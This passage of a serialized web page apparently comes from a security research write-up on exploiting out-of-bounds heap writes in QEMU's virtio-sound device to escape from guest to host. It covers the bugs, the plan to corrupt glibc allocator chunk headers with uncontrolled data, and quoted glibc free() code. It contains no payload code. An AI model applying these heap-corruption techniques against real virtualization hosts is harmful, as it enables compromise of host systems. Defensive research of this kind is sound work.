",{"type":25,"tag":216,"props":129680,"children":129681},{"style":6953},[129682],{"type":31,"value":8519},{"type":25,"tag":216,"props":129684,"children":129685},{"style":6947},[129686],{"type":31,"value":102240},{"type":25,"tag":216,"props":129688,"children":129689},{"style":6964},[129690],{"type":31,"value":7107},{"type":25,"tag":216,"props":129692,"children":129693},{"class":6922,"line":7110},[129694],{"type":25,"tag":216,"props":129695,"children":129696},{"style":6964},[129697],{"type":31,"value":14836},{"type":25,"tag":216,"props":129699,"children":129700},{"class":6922,"line":7216},[129701,129706,129710],{"type":25,"tag":216,"props":129702,"children":129703},{"style":6964},[129704],{"type":31,"value":129705},"    virtio_snd_pcm_set_params ",{"type":25,"tag":216,"props":129707,"children":129708},{"style":6953},[129709],{"type":31,"value":8519},{"type":25,"tag":216,"props":129711,"children":129712},{"style":6964},[129713],{"type":31,"value":129714},"st_params;\n",{"type":25,"tag":216,"props":129716,"children":129717},{"class":6922,"line":7244},[129718],{"type":25,"tag":216,"props":129719,"children":129720},{"emptyLinePlaceholder":16},[129721],{"type":31,"value":7642},{"type":25,"tag":216,"props":129723,"children":129724},{"class":6922,"line":7257},[129725],{"type":25,"tag":216,"props":129726,"children":129727},{"style":6964},[129728],{"type":31,"value":108759},{"type":25,"tag":216,"props":129730,"children":129731},{"class":6922,"line":7275},[129732],{"type":25,"tag":216,"props":129733,"children":129734},{"emptyLinePlaceholder":16},[129735],{"type":31,"value":7642},{"type":25,"tag":216,"props":129737,"children":129738},{"class":6922,"line":7296},[129739,129744,129748,129753],{"type":25,"tag":216,"props":129740,"children":129741},{"style":6964},[129742],{"type":31,"value":129743},"    st_params ",{"type":25,"tag":216,"props":129745,"children":129746},{"style":6953},[129747],{"type":31,"value":266},{"type":25,"tag":216,"props":129749,"children":129750},{"style":7047},[129751],{"type":31,"value":129752}," virtio_snd_pcm_get_params",{"type":25,"tag":216,"props":129754,"children":129755},{"style":6964},[129756],{"type":31,"value":129757},"(s, stream_id);\n",{"type":25,"tag":216,"props":129759,"children":129760},{"class":6922,"line":7305},[129761],{"type":25,"tag":216,"props":129762,"children":129763},{"emptyLinePlaceholder":16},[129764],{"type":31,"value":7642},{"type":25,"tag":216,"props":129766,"children":129767},{"class":6922,"line":7557},[129768],{"type":25,"tag":216,"props":129769,"children":129770},{"style":6964},[129771],{"type":31,"value":108759},{"type":25,"tag":216,"props":129773,"children":129774},{"class":6922,"line":7574},[129775],{"type":25,"tag":216,"props":129776,"children":129777},{"emptyLinePlaceholder":16},[129778],{"type":31,"value":7642},{"type":25,"tag":216,"props":129780,"children":129781},{"class":6922,"line":7591},[129782,129787,129791,129796,129800,129805,129809,129813,129817,129821],{"type":25,"tag":216,"props":129783,"children":129784},{"style":6947},[129785],{"type":31,"value":129786},"    st_params",{"type":25,"tag":216,"props":129788,"children":129789},{"style":6964},[129790],{"type":31,"value":17714},{"type":25,"tag":216,"props":129792,"children":129793},{"style":6947},[129794],{"type":31,"value":129795},"buffer_bytes",{"type":25,"tag":216,"props":129797,"children":129798},{"style":6953},[129799],{"type":31,"value":6956},{"type":25,"tag":216,"props":129801,"children":129802},{"style":7047},[129803],{"type":31,"value":129804}," le32_to_cpu",{"type":25,"tag":216,"props":129806,"children":129807},{"style":6964},[129808],{"type":31,"value":1850},{"type":25,"tag":216,"props":129810,"children":129811},{"style":6947},[129812],{"type":31,"value":102240},{"type":25,"tag":216,"props":129814,"children":129815},{"style":6964},[129816],{"type":31,"value":17714},{"type":25,"tag":216,"props":129818,"children":129819},{"style":6947},[129820],{"type":31,"value":129795},{"type":25,"tag":216,"props":129822,"children":129823},{"style":6964},[129824],{"type":31,"value":7797},{"type":25,"tag":216,"props":129826,"children":129827},{"class":6922,"line":7604},[129828,129832,129836,129840,129844,129848,129852,129856,129860,129864],{"type":25,"tag":216,"props":129829,"children":129830},{"style":6947},[129831],{"type":31,"value":129786},{"type":25,"tag":216,"props":129833,"children":129834},{"style":6964},[129835],{"type":31,"value":17714},{"type":25,"tag":216,"props":129837,"children":129838},{"style":6947},[129839],{"type":31,"value":129245},{"type":25,"tag":216,"props":129841,"children":129842},{"style":6953},[129843],{"type":31,"value":6956},{"type":25,"tag":216,"props":129845,"children":129846},{"style":7047},[129847],{"type":31,"value":129804},{"type":25,"tag":216,"props":129849,"children":129850},{"style":6964},[129851],{"type":31,"value":1850},{"type":25,"tag":216,"props":129853,"children":129854},{"style":6947},[129855],{"type":31,"value":102240},{"type":25,"tag":216,"props":129857,"children":129858},{"style":6964},[129859],{"type":31,"value":17714},{"type":25,"tag":216,"props":129861,"children":129862},{"style":6947},[129863],{"type":31,"value":129245},{"type":25,"tag":216,"props":129865,"children":129866},{"style":6964},[129867],{"type":31,"value":7797},{"type":25,"tag":216,"props":129869,"children":129870},{"class":6922,"line":7613},[129871,129875,129879,129884,129888,129892,129896,129900,129904,129908],{"type":25,"tag":216,"props":129872,"children":129873},{"style":6947},[129874],{"type":31,"value":129786},{"type":25,"tag":216,"props":129876,"children":129877},{"style":6964},[129878],{"type":31,"value":17714},{"type":25,"tag":216,"props":129880,"children":129881},{"style":6947},[129882],{"type":31,"value":129883},"features",{"type":25,"tag":216,"props":129885,"children":129886},{"style":6953},[129887],{"type":31,"value":6956},{"type":25,"tag":216,"props":129889,"children":129890},{"style":7047},[129891],{"type":31,"value":129804},{"type":25,"tag":216,"props":129893,"children":129894},{"style":6964},[129895],{"type":31,"value":1850},{"type":25,"tag":216,"props":129897,"children":129898},{"style":6947},[129899],{"type":31,"value":102240},{"type":25,"tag":216,"props":129901,"children":129902},{"style":6964},[129903],{"type":31,"value":17714},{"type":25,"tag":216,"props":129905,"children":129906},{"style":6947},[129907],{"type":31,"value":129883},{"type":25,"tag":216,"props":129909,"children":129910},{"style":6964},[129911],{"type":31,"value":7797},{"type":25,"tag":216,"props":129913,"children":129914},{"class":6922,"line":7636},[129915],{"type":25,"tag":216,"props":129916,"children":129917},{"style":6927},[129918],{"type":31,"value":129919},"    /* the following are uint8_t, so there's no need to bswap the values. */\n",{"type":25,"tag":216,"props":129921,"children":129922},{"class":6922,"line":7645},[129923,129927,129931,129936,129940,129945,129949,129953],{"type":25,"tag":216,"props":129924,"children":129925},{"style":6947},[129926],{"type":31,"value":129786},{"type":25,"tag":216,"props":129928,"children":129929},{"style":6964},[129930],{"type":31,"value":17714},{"type":25,"tag":216,"props":129932,"children":129933},{"style":6947},[129934],{"type":31,"value":129935},"channels",{"type":25,"tag":216,"props":129937,"children":129938},{"style":6953},[129939],{"type":31,"value":6956},{"type":25,"tag":216,"props":129941,"children":129942},{"style":6947},[129943],{"type":31,"value":129944}," params",{"type":25,"tag":216,"props":129946,"children":129947},{"style":6964},[129948],{"type":31,"value":17714},{"type":25,"tag":216,"props":129950,"children":129951},{"style":6947},[129952],{"type":31,"value":129935},{"type":25,"tag":216,"props":129954,"children":129955},{"style":6964},[129956],{"type":31,"value":6967},{"type":25,"tag":216,"props":129958,"children":129959},{"class":6922,"line":7654},[129960,129964,129968,129973,129977,129981,129985,129989],{"type":25,"tag":216,"props":129961,"children":129962},{"style":6947},[129963],{"type":31,"value":129786},{"type":25,"tag":216,"props":129965,"children":129966},{"style":6964},[129967],{"type":31,"value":17714},{"type":25,"tag":216,"props":129969,"children":129970},{"style":6947},[129971],{"type":31,"value":129972},"format",{"type":25,"tag":216,"props":129974,"children":129975},{"style":6953},[129976],{"type":31,"value":6956},{"type":25,"tag":216,"props":129978,"children":129979},{"style":6947},[129980],{"type":31,"value":129944},{"type":25,"tag":216,"props":129982,"children":129983},{"style":6964},[129984],{"type":31,"value":17714},{"type":25,"tag":216,"props":129986,"children":129987},{"style":6947},[129988],{"type":31,"value":129972},{"type":25,"tag":216,"props":129990,"children":129991},{"style":6964},[129992],{"type":31,"value":6967},{"type":25,"tag":216,"props":129994,"children":129995},{"class":6922,"line":7722},[129996,130000,130004,130009,130013,130017,130021,130025],{"type":25,"tag":216,"props":129997,"children":129998},{"style":6947},[129999],{"type":31,"value":129786},{"type":25,"tag":216,"props":130001,"children":130002},{"style":6964},[130003],{"type":31,"value":17714},{"type":25,"tag":216,"props":130005,"children":130006},{"style":6947},[130007],{"type":31,"value":130008},"rate",{"type":25,"tag":216,"props":130010,"children":130011},{"style":6953},[130012],{"type":31,"value":6956},{"type":25,"tag":216,"props":130014,"children":130015},{"style":6947},[130016],{"type":31,"value":129944},{"type":25,"tag":216,"props":130018,"children":130019},{"style":6964},[130020],{"type":31,"value":17714},{"type":25,"tag":216,"props":130022,"children":130023},{"style":6947},[130024],{"type":31,"value":130008},{"type":25,"tag":216,"props":130026,"children":130027},{"style":6964},[130028],{"type":31,"value":6967},{"type":25,"tag":216,"props":130030,"children":130031},{"class":6922,"line":7730},[130032],{"type":25,"tag":216,"props":130033,"children":130034},{"emptyLinePlaceholder":16},[130035],{"type":31,"value":7642},{"type":25,"tag":216,"props":130037,"children":130038},{"class":6922,"line":7760},[130039,130043,130048],{"type":25,"tag":216,"props":130040,"children":130041},{"style":6973},[130042],{"type":31,"value":20947},{"type":25,"tag":216,"props":130044,"children":130045},{"style":7047},[130046],{"type":31,"value":130047}," cpu_to_le32",{"type":25,"tag":216,"props":130049,"children":130050},{"style":6964},[130051],{"type":31,"value":130052},"(VIRTIO_SND_S_OK);\n",{"type":25,"tag":216,"props":130054,"children":130055},{"class":6922,"line":7768},[130056],{"type":25,"tag":216,"props":130057,"children":130058},{"style":6964},[130059],{"type":31,"value":7874},{"type":25,"tag":38,"props":130061,"children":130062},{},[130063,130065,130070,130072,130078,130080,130085,130087,130092,130094,130100,130101,130106],{"type":31,"value":130064},"Among the guest-controlled PCM parameters, format matters later for exploit reliability. For 8-bit PCM, QEMU accepts both unsigned (",{"type":25,"tag":82,"props":130066,"children":130068},{"className":130067},[],[130069],{"type":31,"value":7378},{"type":31,"value":130071},") and signed (",{"type":25,"tag":82,"props":130073,"children":130075},{"className":130074},[],[130076],{"type":31,"value":130077},"s8",{"type":31,"value":130079},") samples. They encode the same waveform differently - silence is ",{"type":25,"tag":82,"props":130081,"children":130083},{"className":130082},[],[130084],{"type":31,"value":33400},{"type":31,"value":130086}," in ",{"type":25,"tag":82,"props":130088,"children":130090},{"className":130089},[],[130091],{"type":31,"value":7378},{"type":31,"value":130093},", but ",{"type":25,"tag":82,"props":130095,"children":130097},{"className":130096},[],[130098],{"type":31,"value":130099},"0x00",{"type":31,"value":130086},{"type":25,"tag":82,"props":130102,"children":130104},{"className":130103},[],[130105],{"type":31,"value":130077},{"type":31,"value":179},{"type":25,"tag":22753,"props":130108,"children":130109},{},[],{"type":25,"tag":38,"props":130111,"children":130112},{},[130113],{"type":31,"value":130114},"To summarize:",{"type":25,"tag":6711,"props":130116,"children":130117},{},[130118,130137,130155],{"type":25,"tag":2043,"props":130119,"children":130120},{},[130121,130123,130128,130130,130135],{"type":31,"value":130122},"an integer underflow in the ",{"type":25,"tag":82,"props":130124,"children":130126},{"className":130125},[],[130127],{"type":31,"value":128192},{"type":31,"value":130129}," calculation in ",{"type":25,"tag":82,"props":130131,"children":130133},{"className":130132},[],[130134],{"type":31,"value":127697},{"type":31,"value":130136},", resulting in an 8-byte (or less) under-allocation",{"type":25,"tag":2043,"props":130138,"children":130139},{},[130140,130142,130147,130148,130153],{"type":31,"value":130141},"a mismatch in the ",{"type":25,"tag":82,"props":130143,"children":130145},{"className":130144},[],[130146],{"type":31,"value":129424},{"type":31,"value":130129},{"type":25,"tag":82,"props":130149,"children":130151},{"className":130150},[],[130152],{"type":31,"value":129522},{"type":31,"value":130154},", leading to at most 8-byte OOB write",{"type":25,"tag":2043,"props":130156,"children":130157},{},[130158,130160,130165,130167,130172,130174,130179],{"type":31,"value":130159},"a missing bound in the ",{"type":25,"tag":82,"props":130161,"children":130163},{"className":130162},[],[130164],{"type":31,"value":128192},{"type":31,"value":130166}," passed to ",{"type":25,"tag":82,"props":130168,"children":130170},{"className":130169},[],[130171],{"type":31,"value":129542},{"type":31,"value":130173},", which does not take the actual buffer allocation size into account and can therefore lead to an OOB write of an arbitrary length, up to ",{"type":25,"tag":82,"props":130175,"children":130177},{"className":130176},[],[130178],{"type":31,"value":129565},{"type":31,"value":86261},{"type":25,"tag":38,"props":130181,"children":130182},{},[130183,130185,130190,130192,130197,130199,130205],{"type":31,"value":130184},"In our exploit, we focus on the third bug because it provides the largest overflow and therefore the most useful primitive. In practice, the actual write is still bounded by ",{"type":25,"tag":82,"props":130186,"children":130188},{"className":130187},[],[130189],{"type":31,"value":129565},{"type":31,"value":130191},", but in our setup with the ALSA backend, ",{"type":25,"tag":82,"props":130193,"children":130195},{"className":130194},[],[130196],{"type":31,"value":129565},{"type":31,"value":130198}," was consistently around ",{"type":25,"tag":82,"props":130200,"children":130202},{"className":130201},[],[130203],{"type":31,"value":130204},"4096",{"type":31,"value":179},{"type":25,"tag":38,"props":130207,"children":130208},{},[130209,130211,130218,130219,130226],{"type":31,"value":130210},"It is also worth noting that the timing here was particularly unlucky - these bugs had been present in QEMU for over two years, but they were fixed (",{"type":25,"tag":162,"props":130212,"children":130215},{"href":130213,"rel":130214},"https://github.com/qemu/qemu/commit/bcb53328aa70023f1405fade4e253e7f77567261",[166],[130216],{"type":31,"value":130217},"commit 1",{"type":31,"value":7026},{"type":25,"tag":162,"props":130220,"children":130223},{"href":130221,"rel":130222},"https://github.com/qemu/qemu/commit/7994203bb1b83a6604f3ab00fe9598909bb66164",[166],[130224],{"type":31,"value":130225},"commit 2",{"type":31,"value":130227},") in the very same week that we independently found them while manually reviewing the code.",{"type":25,"tag":26,"props":130229,"children":130230},{"id":104066},[130231],{"type":31,"value":104069},{"type":25,"tag":38,"props":130233,"children":130234},{},[130235],{"type":31,"value":130236},"Each of these bugs is in the audio input path. Since that audio input comes from the host side, the bytes written out of bounds are not controlled by the guest and, from the exploit perspective, can be treated as effectively random.",{"type":25,"tag":38,"props":130238,"children":130239},{},[130240],{"type":31,"value":130241},"This gives an interesting challenge: how do you exploit an out-of-bounds write when you do not control the data being written?",{"type":25,"tag":606,"props":130243,"children":130245},{"id":130244},"achieving-a-better-primitive",[130246],{"type":31,"value":130247},"Achieving a Better Primitive",{"type":25,"tag":38,"props":130249,"children":130250},{},[130251],{"type":31,"value":130252},"The first idea that comes to mind is to target some kind of size or offset field. The goal is to make that field as small as possible initially, trigger the overflow, and rely on the corrupted bytes being larger than the original value. Such scenario would transform a weak primitive into a much more useful one, giving us a better starting point for the rest of the exploit.",{"type":25,"tag":38,"props":130254,"children":130255},{},[130256],{"type":31,"value":130257},"However, after searching QEMU for such objects we didn't find a suitable target. The main problem was that, in most cases, the field we wanted to corrupt was preceded by one or more pointers. That would have been acceptable if those pointers were unused, but in every candidate object we examined they were still live. As a result, the heap overflow would corrupt them with effectively random bytes, causing an invalid dereference and crashing QEMU before we could achieve our desired guest-to-host escape.",{"type":25,"tag":38,"props":130259,"children":130260},{},[130261],{"type":31,"value":130262},"At that point, we turned our attention to the glibc allocator. This is usually not the first choice in such targets - allocator techniques are often more version-specific and less portable than program-specific primitives (for example, type confusion on known object layouts). So allocator attacks are often a fallback once object-level paths are exhausted.",{"type":25,"tag":630,"props":130264,"children":130266},{"id":130265},"glibc-allocator",[130267],{"type":31,"value":130268},"Glibc Allocator",{"type":25,"tag":38,"props":130270,"children":130271},{},[130272,130274,130281],{"type":31,"value":130273},"The glibc allocator has already been studied and documented extensively, so we will only cover the basics relevant to this exploit. A good resource for both current and older attack techniques is ",{"type":25,"tag":162,"props":130275,"children":130278},{"href":130276,"rel":130277},"https://github.com/shellphish/how2heap",[166],[130279],{"type":31,"value":130280},"how2heap",{"type":31,"value":179},{"type":25,"tag":41309,"props":130283,"children":130285},{"id":130284},"chunk-layout-and-bins",[130286],{"type":31,"value":130287},"Chunk Layout and Bins",{"type":25,"tag":38,"props":130289,"children":130290},{},[130291],{"type":31,"value":130292},"A chunk looks like this:",{"type":25,"tag":206,"props":130294,"children":130296},{"code":130295},"       +0x0          +0x8\n      +-------------+-------------+\n      |  prev_size  |    size     |\n      +---------------------------+\n+0x10 |  41 41 41 41 41 41 41 41  |\n      |                           |\n      |  41 41 41 41 41 41 41 41  |\n      |                           |\n      |           . . .           |\n",[130297],{"type":25,"tag":82,"props":130298,"children":130299},{"__ignoreMap":7},[130300],{"type":31,"value":130295},{"type":25,"tag":38,"props":130302,"children":130303},{},[130304,130306,130312,130314,130320,130321,130326,130327,130333,130335,130340,130342,130347,130349,130355,130356,130362,130364,130370],{"type":31,"value":130305},"The first 16 bytes form the chunk header. It consists of the ",{"type":25,"tag":82,"props":130307,"children":130309},{"className":130308},[],[130310],{"type":31,"value":130311},"prev_size",{"type":31,"value":130313}," field at offset ",{"type":25,"tag":82,"props":130315,"children":130317},{"className":130316},[],[130318],{"type":31,"value":130319},"0x0",{"type":31,"value":41513},{"type":25,"tag":82,"props":130322,"children":130324},{"className":130323},[],[130325],{"type":31,"value":128192},{"type":31,"value":130313},{"type":25,"tag":82,"props":130328,"children":130330},{"className":130329},[],[130331],{"type":31,"value":130332},"0x8",{"type":31,"value":130334},". As the name suggests, ",{"type":25,"tag":82,"props":130336,"children":130338},{"className":130337},[],[130339],{"type":31,"value":130311},{"type":31,"value":130341}," stores the size of the previous chunk and is only used when that chunk is free, while ",{"type":25,"tag":82,"props":130343,"children":130345},{"className":130344},[],[130346],{"type":31,"value":128192},{"type":31,"value":130348}," stores the size of the current chunk and three special bits of which ",{"type":25,"tag":82,"props":130350,"children":130352},{"className":130351},[],[130353],{"type":31,"value":130354},"PREV_INUSE",{"type":31,"value":1307},{"type":25,"tag":82,"props":130357,"children":130359},{"className":130358},[],[130360],{"type":31,"value":130361},"IS_MMAPPED",{"type":31,"value":130363}," are relevant for this blog post. The actual chunk data begins at offset ",{"type":25,"tag":82,"props":130365,"children":130367},{"className":130366},[],[130368],{"type":31,"value":130369},"0x10",{"type":31,"value":179},{"type":25,"tag":38,"props":130372,"children":130373},{},[130374],{"type":31,"value":130375},"Freed chunks are organized into different bins depending on their size and state. For this writeup, the important one is the per-thread cache, or tcache. Tcache stores recently freed chunks in size-segregated singly linked lists and is generally the first place glibc looks when servicing small allocations.",{"type":25,"tag":41309,"props":130377,"children":130379},{"id":130378},"free-path",[130380],{"type":31,"value":130381},"free() path",{"type":25,"tag":38,"props":130383,"children":130384},{},[130385,130387,130393],{"type":31,"value":130386},"Let’s first look at the ",{"type":25,"tag":82,"props":130388,"children":130390},{"className":130389},[],[130391],{"type":31,"value":130392},"free()",{"type":31,"value":130394}," path in glibc 2.40:",{"type":25,"tag":206,"props":130396,"children":130398},{"code":130397,"language":2254,"meta":7,"className":20473,"style":7},"__libc_free (void *mem)\n{\n  mstate ar_ptr;\n  mchunkptr p;\n\n  p = mem2chunk (mem);\n  if (chunk_is_mmapped (p))\n    {\n      munmap_chunk (p);\n    }\n  else\n    {\n      MAYBE_INIT_TCACHE ();\n\n      ar_ptr = arena_for_chunk (p);\n      _int_free (ar_ptr, p, 0);\n    }\n}\n",[130399],{"type":25,"tag":82,"props":130400,"children":130401},{"__ignoreMap":7},[130402,130430,130437,130445,130453,130460,130482,130503,130510,130523,130530,130538,130545,130558,130565,130586,130607,130614],{"type":25,"tag":216,"props":130403,"children":130404},{"class":6922,"line":6923},[130405,130410,130414,130418,130422,130426],{"type":25,"tag":216,"props":130406,"children":130407},{"style":7047},[130408],{"type":31,"value":130409},"__libc_free",{"type":25,"tag":216,"props":130411,"children":130412},{"style":6964},[130413],{"type":31,"value":7016},{"type":25,"tag":216,"props":130415,"children":130416},{"style":6936},[130417],{"type":31,"value":55595},{"type":25,"tag":216,"props":130419,"children":130420},{"style":6953},[130421],{"type":31,"value":13773},{"type":25,"tag":216,"props":130423,"children":130424},{"style":6947},[130425],{"type":31,"value":44628},{"type":25,"tag":216,"props":130427,"children":130428},{"style":6964},[130429],{"type":31,"value":7107},{"type":25,"tag":216,"props":130431,"children":130432},{"class":6922,"line":6769},[130433],{"type":25,"tag":216,"props":130434,"children":130435},{"style":6964},[130436],{"type":31,"value":14836},{"type":25,"tag":216,"props":130438,"children":130439},{"class":6922,"line":6778},[130440],{"type":25,"tag":216,"props":130441,"children":130442},{"style":6964},[130443],{"type":31,"value":130444},"  mstate ar_ptr;\n",{"type":25,"tag":216,"props":130446,"children":130447},{"class":6922,"line":7005},[130448],{"type":25,"tag":216,"props":130449,"children":130450},{"style":6964},[130451],{"type":31,"value":130452},"  mchunkptr p;\n",{"type":25,"tag":216,"props":130454,"children":130455},{"class":6922,"line":7110},[130456],{"type":25,"tag":216,"props":130457,"children":130458},{"emptyLinePlaceholder":16},[130459],{"type":31,"value":7642},{"type":25,"tag":216,"props":130461,"children":130462},{"class":6922,"line":7216},[130463,130468,130472,130477],{"type":25,"tag":216,"props":130464,"children":130465},{"style":6964},[130466],{"type":31,"value":130467},"  p ",{"type":25,"tag":216,"props":130469,"children":130470},{"style":6953},[130471],{"type":31,"value":266},{"type":25,"tag":216,"props":130473,"children":130474},{"style":7047},[130475],{"type":31,"value":130476}," mem2chunk",{"type":25,"tag":216,"props":130478,"children":130479},{"style":6964},[130480],{"type":31,"value":130481}," (mem);\n",{"type":25,"tag":216,"props":130483,"children":130484},{"class":6922,"line":7244},[130485,130489,130493,130498],{"type":25,"tag":216,"props":130486,"children":130487},{"style":6973},[130488],{"type":31,"value":35356},{"type":25,"tag":216,"props":130490,"children":130491},{"style":6964},[130492],{"type":31,"value":7016},{"type":25,"tag":216,"props":130494,"children":130495},{"style":7047},[130496],{"type":31,"value":130497},"chunk_is_mmapped",{"type":25,"tag":216,"props":130499,"children":130500},{"style":6964},[130501],{"type":31,"value":130502}," (p))\n",{"type":25,"tag":216,"props":130504,"children":130505},{"class":6922,"line":7257},[130506],{"type":25,"tag":216,"props":130507,"children":130508},{"style":6964},[130509],{"type":31,"value":33147},{"type":25,"tag":216,"props":130511,"children":130512},{"class":6922,"line":7275},[130513,130518],{"type":25,"tag":216,"props":130514,"children":130515},{"style":7047},[130516],{"type":31,"value":130517},"      munmap_chunk",{"type":25,"tag":216,"props":130519,"children":130520},{"style":6964},[130521],{"type":31,"value":130522}," (p);\n",{"type":25,"tag":216,"props":130524,"children":130525},{"class":6922,"line":7296},[130526],{"type":25,"tag":216,"props":130527,"children":130528},{"style":6964},[130529],{"type":31,"value":7311},{"type":25,"tag":216,"props":130531,"children":130532},{"class":6922,"line":7305},[130533],{"type":25,"tag":216,"props":130534,"children":130535},{"style":6973},[130536],{"type":31,"value":130537},"  else\n",{"type":25,"tag":216,"props":130539,"children":130540},{"class":6922,"line":7557},[130541],{"type":25,"tag":216,"props":130542,"children":130543},{"style":6964},[130544],{"type":31,"value":33147},{"type":25,"tag":216,"props":130546,"children":130547},{"class":6922,"line":7574},[130548,130553],{"type":25,"tag":216,"props":130549,"children":130550},{"style":7047},[130551],{"type":31,"value":130552},"      MAYBE_INIT_TCACHE",{"type":25,"tag":216,"props":130554,"children":130555},{"style":6964},[130556],{"type":31,"value":130557}," ();\n",{"type":25,"tag":216,"props":130559,"children":130560},{"class":6922,"line":7591},[130561],{"type":25,"tag":216,"props":130562,"children":130563},{"emptyLinePlaceholder":16},[130564],{"type":31,"value":7642},{"type":25,"tag":216,"props":130566,"children":130567},{"class":6922,"line":7604},[130568,130573,130577,130582],{"type":25,"tag":216,"props":130569,"children":130570},{"style":6964},[130571],{"type":31,"value":130572},"      ar_ptr ",{"type":25,"tag":216,"props":130574,"children":130575},{"style":6953},[130576],{"type":31,"value":266},{"type":25,"tag":216,"props":130578,"children":130579},{"style":7047},[130580],{"type":31,"value":130581}," arena_for_chunk",{"type":25,"tag":216,"props":130583,"children":130584},{"style":6964},[130585],{"type":31,"value":130522},{"type":25,"tag":216,"props":130587,"children":130588},{"class":6922,"line":7613},[130589,130594,130599,130603],{"type":25,"tag":216,"props":130590,"children":130591},{"style":7047},[130592],{"type":31,"value":130593},"      _int_free",{"type":25,"tag":216,"props":130595,"children":130596},{"style":6964},[130597],{"type":31,"value":130598}," (ar_ptr, p, ",{"type":25,"tag":216,"props":130600,"children":130601},{"style":6989},[130602],{"type":31,"value":1882},{"type":25,"tag":216,"props":130604,"children":130605},{"style":6964},[130606],{"type":31,"value":7797},{"type":25,"tag":216,"props":130608,"children":130609},{"class":6922,"line":7636},[130610],{"type":25,"tag":216,"props":130611,"children":130612},{"style":6964},[130613],{"type":31,"value":7311},{"type":25,"tag":216,"props":130615,"children":130616},{"class":6922,"line":7645},[130617],{"type":25,"tag":216,"props":130618,"children":130619},{"style":6964},[130620],{"type":31,"value":7874},{"type":25,"tag":38,"props":130622,"children":130623},{},[130624,130626,130631,130633,130638,130640,130646,130648,130654,130656,130661,130663,130668,130670,130675,130677,130682],{"type":31,"value":130625},"We can see that if the ",{"type":25,"tag":82,"props":130627,"children":130629},{"className":130628},[],[130630],{"type":31,"value":130361},{"type":31,"value":130632}," bit is set in the corrupted ",{"type":25,"tag":82,"props":130634,"children":130636},{"className":130635},[],[130637],{"type":31,"value":128192},{"type":31,"value":130639}," field, glibc will call ",{"type":25,"tag":82,"props":130641,"children":130643},{"className":130642},[],[130644],{"type":31,"value":130645},"munmap_chunk",{"type":31,"value":130647},", which internally checks that ",{"type":25,"tag":82,"props":130649,"children":130651},{"className":130650},[],[130652],{"type":31,"value":130653},"prev_size + size",{"type":31,"value":130655}," is page-aligned. To reach the ",{"type":25,"tag":82,"props":130657,"children":130659},{"className":130658},[],[130660],{"type":31,"value":128192},{"type":31,"value":130662}," field, we first have to overwrite the entire 8-byte ",{"type":25,"tag":82,"props":130664,"children":130666},{"className":130665},[],[130667],{"type":31,"value":130311},{"type":31,"value":130669}," field with uncontrolled data. The chance that a corrupted ",{"type":25,"tag":82,"props":130671,"children":130673},{"className":130672},[],[130674],{"type":31,"value":130653},{"type":31,"value":130676}," value still ends up page-aligned is extremely small. In practice, if ",{"type":25,"tag":82,"props":130678,"children":130680},{"className":130679},[],[130681],{"type":31,"value":130361},{"type":31,"value":130683}," is set, the process will almost certainly abort before we can make use of the corruption.",{"type":25,"tag":38,"props":130685,"children":130686},{},[130687,130689,130694,130696,130702],{"type":31,"value":130688},"Assuming ",{"type":25,"tag":82,"props":130690,"children":130692},{"className":130691},[],[130693],{"type":31,"value":130361},{"type":31,"value":130695}," is not set, execution continues into ",{"type":25,"tag":82,"props":130697,"children":130699},{"className":130698},[],[130700],{"type":31,"value":130701},"_int_free",{"type":31,"value":1472},{"type":25,"tag":206,"props":130704,"children":130706},{"code":130705,"language":2254,"meta":7,"className":20473,"style":7},"static void\n_int_free (mstate av, mchunkptr p, int have_lock)\n{\n  INTERNAL_SIZE_T size;\n\n  size = chunksize (p);\n\n  /* Little security check which won't hurt performance: the\n     allocator never wraps around at the end of the address space.\n     Therefore we can exclude some size values which might appear\n     here by accident or by \"design\" from some intruder.  */\n  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)\n      || __builtin_expect (misaligned_chunk (p), 0))\n    malloc_printerr (\"free(): invalid pointer\");\n  /* We know that each chunk is at least MINSIZE bytes in size or a\n     multiple of MALLOC_ALIGNMENT.  */\n  if (__glibc_unlikely (size \u003C MINSIZE || !aligned_OK (size)))\n    malloc_printerr (\"free(): invalid size\");\n\n  check_inuse_chunk(av, p);\n\n  [...]\n",[130707],{"type":25,"tag":82,"props":130708,"children":130709},{"__ignoreMap":7},[130710,130722,130765,130772,130780,130787,130808,130815,130823,130831,130839,130847,130911,130946,130967,130975,130983,131031,131051,131058,131071,131078],{"type":25,"tag":216,"props":130711,"children":130712},{"class":6922,"line":6923},[130713,130717],{"type":25,"tag":216,"props":130714,"children":130715},{"style":6936},[130716],{"type":31,"value":55013},{"type":25,"tag":216,"props":130718,"children":130719},{"style":6936},[130720],{"type":31,"value":130721}," void\n",{"type":25,"tag":216,"props":130723,"children":130724},{"class":6922,"line":6769},[130725,130729,130734,130739,130744,130748,130752,130756,130761],{"type":25,"tag":216,"props":130726,"children":130727},{"style":7047},[130728],{"type":31,"value":130701},{"type":25,"tag":216,"props":130730,"children":130731},{"style":6964},[130732],{"type":31,"value":130733}," (mstate ",{"type":25,"tag":216,"props":130735,"children":130736},{"style":6947},[130737],{"type":31,"value":130738},"av",{"type":25,"tag":216,"props":130740,"children":130741},{"style":6964},[130742],{"type":31,"value":130743},", mchunkptr ",{"type":25,"tag":216,"props":130745,"children":130746},{"style":6947},[130747],{"type":31,"value":38},{"type":25,"tag":216,"props":130749,"children":130750},{"style":6964},[130751],{"type":31,"value":7026},{"type":25,"tag":216,"props":130753,"children":130754},{"style":6936},[130755],{"type":31,"value":23007},{"type":25,"tag":216,"props":130757,"children":130758},{"style":6947},[130759],{"type":31,"value":130760}," have_lock",{"type":25,"tag":216,"props":130762,"children":130763},{"style":6964},[130764],{"type":31,"value":7107},{"type":25,"tag":216,"props":130766,"children":130767},{"class":6922,"line":6778},[130768],{"type":25,"tag":216,"props":130769,"children":130770},{"style":6964},[130771],{"type":31,"value":14836},{"type":25,"tag":216,"props":130773,"children":130774},{"class":6922,"line":7005},[130775],{"type":25,"tag":216,"props":130776,"children":130777},{"style":6964},[130778],{"type":31,"value":130779},"  INTERNAL_SIZE_T size;\n",{"type":25,"tag":216,"props":130781,"children":130782},{"class":6922,"line":7110},[130783],{"type":25,"tag":216,"props":130784,"children":130785},{"emptyLinePlaceholder":16},[130786],{"type":31,"value":7642},{"type":25,"tag":216,"props":130788,"children":130789},{"class":6922,"line":7216},[130790,130795,130799,130804],{"type":25,"tag":216,"props":130791,"children":130792},{"style":6964},[130793],{"type":31,"value":130794},"  size 